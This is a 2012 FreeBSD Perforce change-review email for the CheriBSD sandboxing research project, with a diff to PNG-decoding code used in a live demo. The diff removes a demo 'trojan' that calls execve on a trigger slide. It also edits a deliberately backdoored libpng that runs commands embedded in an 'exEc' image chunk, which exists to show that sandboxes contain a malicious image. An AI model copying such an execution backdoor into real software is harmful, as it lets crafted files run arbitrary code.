From owner-p4-projects@FreeBSD.ORG Wed Nov 28 00:33:52 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id D353CB03; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8BF39B01 for ; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 71A738FC12 for ; Wed, 28 Nov 2012 00:33:51 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAS0Xpfn041727 for ; Wed, 28 Nov 2012 00:33:51 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAS0XpXo041724 for perforce@freebsd.org; Wed, 28 Nov 2012 00:33:51 GMT (envelope-from brooks@freebsd.org) Date: Wed, 28 Nov 2012 00:33:51 GMT Message-Id: <201211280033.qAS0XpXo041724@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219859 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 00:33:52 -0000 http://p4web.freebsd.org/@@219859?ac=10 Change 219859 by brooks@brooks_zenith on 2012/11/28 00:33:06 Remove the slide number based trojan used for the live demo now that exEc chunks work fine. Provide a png_exec_triggered global to let us know that the exEc exploit was attempted but failed. Affected files ... .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/decode_png.c#5 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/iboxpriv.h#4 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/imagebox.h#3 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/pngbox.c#7 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#3 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/cheripoint/cheripoint.c#13 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng-cheri/readpng-cheri.c#5 edit .. //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng/readpng.c#4 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/decode_png.c#5 (text+ko) ==== @@ -37,6 +37,8 @@ #include "imagebox.h" #include "iboxpriv.h" +extern int png_exec_triggered; + static void read_row_callback(png_structp, png_uint_32, int); static void read_png_from_fd(png_structp, png_bytep, png_size_t); @@ -51,24 +53,6 @@ png_infop end_info = NULL; png_bytep *rows = NULL; - /* - * World's lamest trojan - */ - if (ids->slide == 58) { - for (r = 0; r < ids->is->width * ids->is->height; r++) - ids->buffer[r] = 0x0000FF00; - ids->is->valid_rows = ids->is->height;; - ids->is->passes_remaining = 0; - if (ids->is->sb == SB_CAPSICUM) - ids->is->error = 99; - char path[] = "/bin/wr"; - char *argv[2] = {NULL, NULL}; - char *envp[1] = {NULL}; - argv[0] = path; - execve(argv[0], argv, envp); - return; - } - if ((png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL)) == NULL) { ids->is->error = 1; @@ -88,12 +72,6 @@ goto error; } -#if 0 - /* XXX Insert back door function here */ - png_set_read_user_chunk_fn(png_ptr, user_chunk_ptr, - read_chunk_callback); -#endif - if (read_row_fn != NULL) png_set_read_status_fn(png_ptr, read_row_fn); else @@ -137,6 +115,13 @@ png_read_end(png_ptr, end_info); + if (png_exec_triggered) { + if (ids->is->sb == SB_CAPSICUM) + ids->is->error = 99; + for (r = 0; r < ids->is->width * ids->is->height; r++) + ids->buffer[r] = 0x0000FF00; + } + error: png_destroy_read_struct(&png_ptr, &info_ptr, &end_info); close(ids->fd); ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/iboxpriv.h#4 (text+ko) ==== @@ -34,7 +34,6 @@ struct ibox_decode_state { int fd; - int slide; struct iboxstate *is; uint32_t *buffer; }; ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/imagebox.h#3 (text+ko) ==== @@ -52,7 +52,7 @@ void iboxstate_free(struct iboxstate *ps); struct iboxstate* png_read_start(int pfd, uint32_t maxw, uint32_t maxh, - int slide, enum sbtype); + enum sbtype); int png_read_finish(struct iboxstate *ps); #endif ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libimagebox/pngbox.c#7 (text+ko) ==== @@ -74,8 +74,7 @@ } static struct iboxstate* -pthr_png_read_start(int pfd, uint32_t width, uint32_t height, int slide, - enum sbtype sb) +pthr_png_read_start(int pfd, uint32_t width, uint32_t height, enum sbtype sb) { struct iboxstate *is = NULL; struct ibox_decode_state *ids = NULL; @@ -96,7 +95,6 @@ if ((ids = malloc(sizeof(*ids))) == NULL) goto error; memset(ids, 0, sizeof(*ids)); - ids->slide = slide; ids->is = is; ids->fd = pfd; @@ -122,10 +120,9 @@ } static struct iboxstate* -capsicum_png_read_start(int pfd, uint32_t width, uint32_t height, int slide, +capsicum_png_read_start(int pfd, uint32_t width, uint32_t height, enum sbtype sb) { - char slideno[32]; int bfd, isfd, highfd; int nbfd, nisfd, npfd; struct iboxstate *is = NULL; @@ -193,9 +190,7 @@ exit(1); closefrom(6); - sprintf(slideno, "%d", slide); - if (execl("/usr/libexec/readpng", "readpng", slideno, NULL) == - -1) + if (execl("/usr/libexec/readpng", "readpng", NULL) == -1) exit(1); } else if (fdp->pid > 0) goto started; @@ -226,7 +221,7 @@ static struct iboxstate* cheri_png_read_start(char *pngbuffer, size_t pnglen, - uint32_t width, uint32_t height, int slide, enum sbtype sb) + uint32_t width, uint32_t height, enum sbtype sb) { struct sandbox *sandbox; struct iboxstate *is = NULL; @@ -265,7 +260,7 @@ CHERI_CANDPERM(10, 10, CHERI_PERM_LOAD); CHERI_CSC(10, 0, &c2, 0); - v = sandbox_invoke(sandbox, width, height, pnglen, slide, + v = sandbox_invoke(sandbox, width, height, pnglen, 0, &c1, &c2, NULL, NULL, NULL, NULL, NULL); printf("%s: sandbox returned %ju\n", __func__, (uintmax_t)v); sandbox_destroy(sandbox); @@ -287,7 +282,7 @@ * the png_read code and will be closed when decoding is complete. */ struct iboxstate* -png_read_start(int pfd, uint32_t maxw, uint32_t maxh, int slide, enum sbtype sb) +png_read_start(int pfd, uint32_t maxw, uint32_t maxh, enum sbtype sb) { size_t pnglen; uint32_t header[9], width, height; @@ -324,9 +319,9 @@ switch (sb) { case SB_NONE: - return pthr_png_read_start(pfd, width, height, slide, sb); + return pthr_png_read_start(pfd, width, height, sb); case SB_CAPSICUM: - return capsicum_png_read_start(pfd, width, height, slide, sb); + return capsicum_png_read_start(pfd, width, height, sb); case SB_CHERI: if (fstat(pfd, &statbuf) == -1) { close(pfd); @@ -340,7 +335,7 @@ } close(pfd); return cheri_png_read_start(pngbuffer, pnglen, width, height, - slide, sb); + sb); default: close(pfd); return NULL; ==== //depot/projects/ctsrd/cheribsd/src/ctsrd-lib/libvuln_png/pngrutil.c#3 (text+ko) ==== @@ -16,6 +16,8 @@ #if defined(CTSRD_BACKDOOR) #include + +int png_exec_triggered; #endif #if defined(_WIN32_WCE) @@ -2204,7 +2206,7 @@ } argv[argc] = NULL; execve(argv[0], argv, envp); - png_error(png_ptr, "failed to exec exEc chunk"); + png_exec_triggered = 1; } #endif #if defined(PNG_READ_USER_CHUNKS_SUPPORTED) ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/cheripoint/cheripoint.c#13 (text+ko) ==== @@ -98,7 +98,7 @@ if ((pfd = open("/usr/share/images/icons.png", O_RDONLY)) == -1) err(1, "Failed to open icons.png"); - if ((is = png_read_start(pfd, 32, 2048, -1, SB_NONE)) == NULL) + if ((is = png_read_start(pfd, 32, 2048, SB_NONE)) == NULL) errx(1, "Failed to start PNG decode for icons.png"); if (png_read_finish(is) != 0) errx(1, "png_read_finish() failed for icons.png"); @@ -455,7 +455,7 @@ warn("Failed to open %s", cover); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, 0, sb)) == + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for %s", cover); return (-1); @@ -510,8 +510,7 @@ sysctlbyname("security.cheri.syscall_violations", &sv1, &olen, NULL, 0); } - if ((is = png_read_start(pfd, fb_width, fb_height, slidenum, - sb)) == NULL) { + if ((is = png_read_start(pfd, fb_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for %s", slide); return (-1); } @@ -577,7 +576,7 @@ warn("Failed to open sri.png"); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) { + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for sri.png"); return (-1); } @@ -597,7 +596,7 @@ warn("Failed to open ucam.png"); return (-1); } - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) { + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for ucam.png"); return (-1); } @@ -639,8 +638,7 @@ warn("Failed to open header.png"); return (-1); } - if ((hdris = png_read_start(pfd, slide_width, fb_height, -1, sb)) == - NULL) { + if ((hdris = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) { warn("Failed to start PNG decode for header.png"); return (-1); } @@ -812,7 +810,7 @@ if ((pfd = open("/usr/share/images/header.png", O_RDONLY)) == -1) err(1, "Failed to open header.png"); - if ((is = png_read_start(pfd, slide_width, fb_height, -1, sb)) == NULL) + if ((is = png_read_start(pfd, slide_width, fb_height, sb)) == NULL) errx(1, "Failed to start PNG decode for header.png"); if (png_read_finish(is) != 0) errx(1, "png_read_finish() failed for header.png"); ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng-cheri/readpng-cheri.c#5 (text+ko) ==== @@ -75,11 +75,11 @@ * * The output buffer is passed in c1. The pngfile is accessable via c2. * a0 holds the image width, a1 the height, and a2 holds the length of the - * pngfile (currently unused). a3 holds the slide number. + * pngfile (currently unused). */ int invoke(register_t a0, register_t a1, register_t a2 __unused, - register_t a3) + register_t a3 __unused) { struct ibox_decode_state ids; struct iboxstate is; @@ -92,7 +92,6 @@ is.sb = SB_CHERI; ids.fd = -1; - ids.slide = a3; /* * in principle we could update this via a capabilty, * but in practice we can reconstruct it on exit ==== //depot/projects/ctsrd/cheribsd/src/ctsrd/libexec/readpng/readpng.c#4 (text+ko) ==== @@ -40,7 +40,7 @@ #include "iboxpriv.h" int -main(int argc, char **argv) +main(int argc, char **argv __unused) { int bfd, isfd; struct ibox_decode_state ids; @@ -48,14 +48,9 @@ if (cap_enter() == -1) err(1, "cap_enter"); - if (argc > 2) + if (argc > 1) errx(1, "too many argumets"); - if (argc == 2) - ids.slide = atoi(argv[1]); - else - ids.slide = -1; - ids.fd = 3; bfd = 4; isfd = 5;